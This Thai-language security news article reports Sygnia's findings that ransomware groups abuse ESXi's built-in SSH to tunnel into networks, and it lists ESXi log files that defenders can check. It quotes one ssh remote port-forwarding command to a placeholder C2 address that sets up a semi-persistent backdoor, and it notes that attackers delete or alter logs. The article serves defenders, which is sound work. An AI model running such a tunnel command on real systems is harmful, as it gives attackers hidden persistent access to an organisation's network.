พบกลุ่ม Ransomware ที่กำลังมุ่งเป้าหมายการโจมตีไปยัง Hypervisors ของ ESXi โดยใช้ SSH tunneling เพื่อเข้าถึง และแฝงตัวในระบบของเป้าหมายได้โดยไม่ถูกตรวจจับ
VMware ESXi appliance มีความสำคัญต่อ Virtualized Environment เนื่องจากสามารถทำงานบน physical server หรือ multiple virtual machines ขององค์กรได้ โดยส่วนใหญ่แล้วระบบเหล่านี้มักไม่ได้รับการตรวจสอบ และตกเป็นเป้าหมายของกลุ่ม Hacker ที่ต้องการเข้าถึงเครือข่ายขององค์กร ทำให้สามารถขโมยข้อมูล และเข้ารหัสไฟล์ได้ ส่งผลให้ธุรกิจทั้งหมดหยุดชะงัก เนื่องจากไม่สามารถเข้าถึง virtual machines ทั้งหมดได้
Sygnia บริษัทด้านความปลอดภัยทางไซเบอร์รายงานว่าในหลาย ๆ กรณี การโจมตีเกิดขึ้นโดยการใช้ช่องโหว่ที่เป็นที่รู้จักอยู่แล้ว หรือใช้ข้อมูล credentials ของผู้ดูแลระบบที่ถูกขโมยมาจากการโจมตีอื่น
การใช้ SSH เพื่อเข้าสู่ Hypervisor
ESXi มีฟีเจอร์ built-in SSH service ที่ช่วยให้ผู้ดูแลระบบสามารถจัดการ hypervisor จากระยะไกลผ่าน SSH ได้
Sygnia ระบุว่า กลุ่ม Ransomware ได้ใช้ฟีเจอร์นี้เพื่อแฝงตัว รวมถึงแพร่กระจายต่อไปในระบบ และติดตั้งเพย์โหลดของ Ransomware เนื่องจากองค์กรหลายแห่งไม่ได้ตรวจสอบพฤติกรรม SSH ของ ESXi อย่างจริงจัง Hacker จึงสามารถใช้ฟีเจอร์นี้เพื่อแอบโจมตีได้
เมื่อ Hacker สามารถเข้าถึงอุปกรณ์ได้แล้ว ก็สามารถทำการตั้งค่าเพื่อสร้าง SSH tunneling ได้อย่างง่ายดาย โดยใช้ SSH function หรือใช้เครื่องมือทั่วไปอื่น ๆ ที่มีความสามารถคล้ายกัน ตัวอย่างเช่น การใช้ SSH binary จะสามารถตั้งค่า remote port-forwarding ไปยัง C2 server ได้อย่างง่ายดาย โดยใช้คำสั่งต่อไปนี้: ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>
ทั้งนี้ ESXi appliance มีความยืดหยุ่น และแทบไม่เคยปิดระบบ ดังนั้นการสร้าง SSH tunneling จึงทำหน้าที่เหมือนเป็น semi-persistent backdoor ภายในเครือข่าย
ข้อบกพร่องในการ Logging
รวมถึง Sygnia ได้รายงานถึงข้อบกพร่องในการ Monitoring ESXi logs ที่ทำให้ Hacker สามารถซ่อน Log ที่แสดงถึงการโจมตีได้
การ Logging ของ ESXi ไม่เหมือนระบบส่วนใหญ่ที่ log จะถูกรวบรวมไว้ในไฟล์ syslog เดียว แต่ ESXi จะกระจาย log ไปยัง log file เฉพาะหลายไฟล์ ดังนั้นการค้นหาหลักฐานจึงต้องรวบรวมข้อมูลจากหลายแหล่งเข้าด้วยกัน
Sygnia ได้แนะนำให้ผู้ดูแลระบบตรวจสอบ log file ทั้ง 4 รายการนี้เพื่อตรวจจับการสร้าง SSH tunneling และการโจมตีของ Ransomware :
/var/log/shell.log → ติดตามการเรียกใช้คำสั่งใน ESXi Shell
/var/log/hostd.log → บันทึกกิจกรรมการบริหารจัดการระบบ และการตรวจสอบสิทธิ์ของผู้ใช้
/var/log/auth.log → บันทึกความพยายามในการ login และ authentication event
/var/log/vobd.log → จัดเก็บ system และ security event log
นอกจากนี้ hostd.log และ vodb.log ยังอาจมีร่องรอยของการแก้ไข firewall rules ซึ่งถือเป็นสิ่งสำคัญในการอนุญาตการเข้าถึง SSH แบบต่อเนื่อง
ข้อสังเกตุกลุ่ม Ransomware มักจะทำการลบ log เพื่อลบหลักฐานการเข้าถึง SSH แก้ไขวันที่ และเวลา หรือตัดทอน log เพื่อทำให้สับสนในการค้นหา ดังนั้นการค้นหาหลักฐานจึงไม่ใช่เรื่องง่ายเสมอไป
ท้ายที่สุดขอแนะนำให้องค์กรรวบรวม ESXi logs โดยการส่งต่อ syslog และรวมข้อมูลไปยัง Security Information & Event Management (SIEM) เพื่อใช้สำหรับตรวจจับความผิดปกติ
ที่มา : bleepingcomputer
You must be logged in to post a comment.